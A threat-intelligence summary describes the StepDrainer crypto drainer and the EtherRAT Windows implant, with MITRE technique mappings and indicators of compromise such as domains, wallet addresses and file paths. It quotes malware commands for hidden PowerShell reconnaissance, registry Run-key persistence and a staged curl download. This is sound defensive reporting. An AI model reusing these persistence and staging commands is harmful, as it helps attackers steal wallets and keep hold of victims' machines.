Crypto‑themed threats and traditional cybercrime infrastructures are converging: credential‑harvesting, loader, and botnet ecosystems are being repurposed to host polished wallet‑phishing pages and drainer tooling that automate multichain asset theft. The report analyzes two cases—StepDrainer (a multichain drainer leveraging Web3Modal and automated stealing methods) and EtherRAT (a hybrid Windows implant delivered via a trojanized TFTP/MSI installer) —highlighting techniques such as dynamic script injection, obfuscated JavaScript payloads, on‑chain configuration, and persistence via registry Run keys. #StepDrainer #EtherRAT
Keypoints
- Drainers and commodity malware ecosystems are converging: infrastructure for credential theft is now reused to host wallet‑phishing content and drainer tooling is being integrated into established malware operations.
- StepDrainer is a commercialized multichain drainer (sold as MaaS) that targets 20+ networks, automates asset reconnaissance and theft (ETH, tokens, NFTs), and uses Web3Modal to present authentic‑looking wallet modals.
- Campaign infrastructure uses a lightweight stager API deployed across thousands of domains, Solana on‑chain configuration stores, randomized PHP backends, and heavily obfuscated JavaScript next stages.
- High‑fidelity social engineering (AI‑themed dashboards, trading portals, compliance UIs) is central to initial access, tricking users into wallet approvals or “top‑ups” (e.g., Solana fee prompts).
- EtherRAT demonstrates a hybrid model: a trojanized Tftpd64 MSI delivered a bundled Node.js runtime and an obfuscated .dat implant, establishing persistence via HKCU Run and performing host reconnaissance while contacting Ethereum RPC endpoints.
- Campaigns employ supply‑chain and impersonation tactics (malicious GitHub repos, OpenClaw impersonation, Vercel deep‑links) and use encrypted configuration and obfuscation to evade detection and hinder attribution.
- The ecosystem’s industrialization (drainer‑as‑a‑service kits, polished marketing, Telegram logging) lowers barriers to entry and expands the pool of actors able to perform stealthy, automated multichain thefts.
MITRE Techniques
- [T1566.001 ] Phishing: Spearphishing Link – high‑fidelity web lures and trading/compliance portals are used as initial access vectors (‘visually refined trading portals that resemble mainstream fintech dashboards’).
- [T1059.007 ] Command and Scripting Interpreter: JavaScript – browser‑side drainer logic and injected payloads are implemented in JavaScript (‘”settings.js” script is a browser‑side wallet drainer written in JavaScript using Ethers.js and Web3.js’).
- [T1059.001 ] Command and Scripting Interpreter: PowerShell – PowerShell commands are used for silent host reconnaissance (‘powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).Domain”‘).
- [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys – persistence is achieved by adding an HKCU Run key to invoke the Node.js payload at logon (‘reg add “HKCUSoftwareMicrosoftWindowsCurrentVersionRun” /v “6e4653c4b8cf” …’).
- [T1105 ] Ingress Tool Transfer – malicious installers and staged downloads deliver implants and runtimes (trojanized MSI and external Node.js retrieval via curl) (‘curl -s -L -o “C:UsersuserAppDataLocalTempY4M3E93g4Z.zip” “https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip”‘).
- [T1195 ] Supply Chain Compromise – distribution via a malicious GitHub repository impersonating an official project (‘malicious GitHub repository impersonating the official project and offering downloads for “Tftpd64 v4.74″‘).
- [T1027 ] Obfuscated Files or Information – payloads and configuration are obfuscated/encrypted to evade detection (‘heavily obfuscated JavaScript payload’ and ‘obfuscated .dat file as the true payload’).
- [T1071.001 ] Application Layer Protocol: Web Protocols – C2 and campaign routing use web/RPC APIs and HTTP endpoints for Solana and EVM interactions (‘”hXXps://api.mainnet-beta.solana[.]com” “hXXps://rpc.ankr[.]com/solana”‘).
- [T1036 ] Masquerading – attackers impersonate legitimate projects, wallets, and services to gain trust (impersonation of OpenClaw and legitimate wallet modals: ‘impersonation of OpenClaw’ and Web3Modal branding usage).
- [T1573.001 ] Encrypted Channel: Symmetric Cryptography – configuration and staged components are encrypted with symmetric cryptography (AES‑256‑CBC used for encrypted configuration storage: ‘AES‑256‑CBC with bundled keys and IVs’).
Indicators of Compromise
- [Domain ] C2/backend and staging infrastructure – 8kwfaa30jtlnwi[.]com, wpuadmin[.]shop, and 3,000+ other malicious domains used as stager/API endpoints.
- [Solana account ] on‑chain configuration store – 8ycauMwVE61B4uWz87B2k2G8mMK7iFjRoBHooaVAcP4k (account used to store campaign domains and referenced in on‑chain transactions).
- [Smart contract / Ethereum address ] on‑chain reference for backend retrieval – 0xe9d5f645f79fa60fca82b4e1d35832e43370feb0 (smart contract address referenced for domain retrieval).
- [RPC / API endpoints ] blockchain and proxy endpoints used by stagers – hXXps://api.mainnet-beta.solana[.]com, hXXps://rpc.ankr[.]com/solana (and other public/private RPC endpoints and Flashbots/Tenderly nodes).
- [Files / filenames ] dropped/staged payloads and scripts – C:UsersuserAppDataLocalUHpNJrMDHL9sstLd.dat, settings.js, seaport.js (and accompanying .ini/.tmp/.cmd helper files).
- [Installer / package ] trojanized distribution artifacts – trojanized “Tftpd64 v4.74” MSI and ZIP archives retrieved from a malicious GitHub repository.
- [Registry ] persistence entry – HKCUSoftwareMicrosoftWindowsCurrentVersionRun with value name “6e4653c4b8cf” pointing to conhost.exe invoking node.exe.
- [Base64 blobs ] embedded initialization/configuration parameters – Base64‑encoded initialData payloads inside Vercel deep‑link parameters and Base64 account data returned by Solana RPC (used to decode campaign domains).